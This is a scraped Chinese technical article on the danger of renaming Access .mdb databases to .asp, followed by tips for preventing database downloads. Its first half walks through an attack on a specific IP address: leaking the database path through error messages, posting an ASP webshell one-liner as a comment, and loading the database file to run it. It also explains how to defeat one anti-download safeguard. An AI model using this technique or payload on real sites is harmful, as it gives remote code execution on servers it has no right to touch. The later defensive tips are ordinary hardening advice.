主頁 > 知識(shí)庫 > access改mdb為asp所帶來的災(zāi)難 附mdb防下載方法

access改mdb為asp所帶來的災(zāi)難 附mdb防下載方法
熱門標(biāo)簽:智能電銷機(jī)器人適用于哪些行業(yè) 徐州人工智能電銷機(jī)器人好用嗎 長(zhǎng)沙防封電銷卡品牌 地圖標(biāo)注服務(wù)哪家好 西寧公司外呼系統(tǒng)平臺(tái) 騰訊地圖標(biāo)注商戶關(guān)閉 地圖標(biāo)注宅基地 武漢營(yíng)銷電話機(jī)器人軟件 外呼系統(tǒng)還用卡么
先不說直接改后綴,直接可以用網(wǎng)快等工具直接下載,其實(shí)這樣你已經(jīng)是為入侵者打開了大門。入侵者可以利用asp/asa為后綴的數(shù)據(jù)庫直接得到webshell。

一.思路

  大家都知道%%>為asp文件的標(biāo)志符,也就是說一個(gè)asp文件只會(huì)去執(zhí)行%%>之間的代碼,access+asp的web系統(tǒng)的所有數(shù)據(jù)都是存放在數(shù)據(jù)庫文件里(mdb文件),由于管理者把mdb文件改為了asp文件,如果我們提交的數(shù)據(jù)里包含有%%>,那當(dāng)我們?cè)L問這個(gè)asp數(shù)據(jù)庫的時(shí)候就會(huì)去執(zhí)行%%>之間的代碼。這樣導(dǎo)致我們只提交惡意代碼給數(shù)據(jù)庫,那么asp后綴的數(shù)據(jù)庫就是我們的webshell了。

二.示例

  隨便找個(gè)目標(biāo),首先我們暴庫,看是不是asp后綴的數(shù)據(jù)庫:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5log_id=210


  返回:
復(fù)制代碼 代碼如下:

Microsoft VBScript 編譯器錯(cuò)誤 錯(cuò)誤 '800a03f6'
缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯(cuò)誤 '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp'不是一個(gè)有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務(wù)器。

/test/conn.asp,行18


  我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網(wǎng)際快車等工具直接下載數(shù)據(jù)庫(這里我們不討論)。我們回到主頁看到有提供“網(wǎng)友評(píng)論”功能。我們注冊(cè)個(gè)用戶,發(fā)一條評(píng)論:

%execute request("b")%>

  這樣我們就把a(bǔ)sp代碼:%execute request("b")%>寫入了數(shù)據(jù)庫,那么數(shù)據(jù)庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到:

復(fù)制代碼 代碼如下:

/iisHelp/common/500-100.asp,行242
Microsoft VBScript 運(yùn)行時(shí)錯(cuò)誤 錯(cuò)誤 '800a000d'

類型不匹配: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266


  注意:我們?cè)谙驍?shù)據(jù)庫提交代碼時(shí),代碼內(nèi)容不可以太大。所以我們采用%execute request("b")%>。

三.其他一些問題和思路

  1.對(duì)于改了后綴為asp,還對(duì)數(shù)據(jù)庫里加入了%='a'-1%>等非法的asp代碼來徹底防止下載的數(shù)據(jù)庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運(yùn)行,將只會(huì)顯示前面非法代碼的錯(cuò)誤,而不去執(zhí)行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯(cuò)的代碼前加入兼容錯(cuò)誤的代碼,就可以得到正確顯示執(zhí)行我們插入的webshell代碼了。

 ?。玻畬?duì)于沒有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺(tái)密碼,進(jìn)了后臺(tái),可以利用數(shù)據(jù)庫備用改后綴為asp。

mdb防下載方法小結(jié)

1:在iis6下面 如果一個(gè)擴(kuò)展名沒有被定義則 訪問的時(shí)候會(huì)出現(xiàn)文件沒有找到的404錯(cuò)誤。
因此你可以將數(shù)據(jù)庫任意命名成一個(gè)絕對(duì)不會(huì)出現(xiàn)的文件名就可以達(dá)到安全的效果比如:xxxxx.xxxxxxxxxxx


2 將數(shù)據(jù)庫放在網(wǎng)站的外部,那絕對(duì)就不能訪問得到了。例如: e:/web/是你的網(wǎng)站
則把數(shù)據(jù)庫放在e:/

3 正如樓上所說的 將.mdb 改成 .asp 同時(shí)倒入一個(gè)特殊的表 包含 % 的二進(jìn)制字符 這樣訪問文件出現(xiàn) 缺少腳本關(guān)閉符的提示。
4 或者將.mdb 改成.asp 同時(shí)用winhex打開 可以發(fā)現(xiàn)176以后有很長(zhǎng)一部分 00 字符串 你隨便在處改成一段asp代碼 也可以實(shí)現(xiàn)防止下載,這樣也不影響數(shù)據(jù)庫功能。例如:
%
response.write("非法訪問")
response.end()
%>


現(xiàn)在在數(shù)據(jù)庫的名稱里 加上 “#” 和空格 都被破解了 比如“#” = “%35” 而空格 = “%20”

所以說 現(xiàn)在用這些已經(jīng)不管用了。。


如果是自己的服務(wù)器的話就在IIS里設(shè)置一下:

新建一個(gè)空白的DLL文件,然后在IIS里添加映射,可執(zhí)行文件選剛才建的這個(gè)DLL,擴(kuò)展名填.mdb,保存后重啟一下IIS服務(wù)即可。
您可能感興趣的文章:
  • IIS下防止mdb數(shù)據(jù)庫被下載的實(shí)現(xiàn)方法
  • 九種防MDB數(shù)據(jù)庫被下載的方法小結(jié)

標(biāo)簽:雅安 通化 通遼 荊門 普洱 巴彥淖爾 運(yùn)城 鷹潭

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《access改mdb為asp所帶來的災(zāi)難 附mdb防下載方法》,本文關(guān)鍵詞  access,改,mdb,為,asp,所,帶來,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《access改mdb為asp所帶來的災(zāi)難 附mdb防下載方法》相關(guān)的同類信息!
  • 本頁收集關(guān)于access改mdb為asp所帶來的災(zāi)難 附mdb防下載方法的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章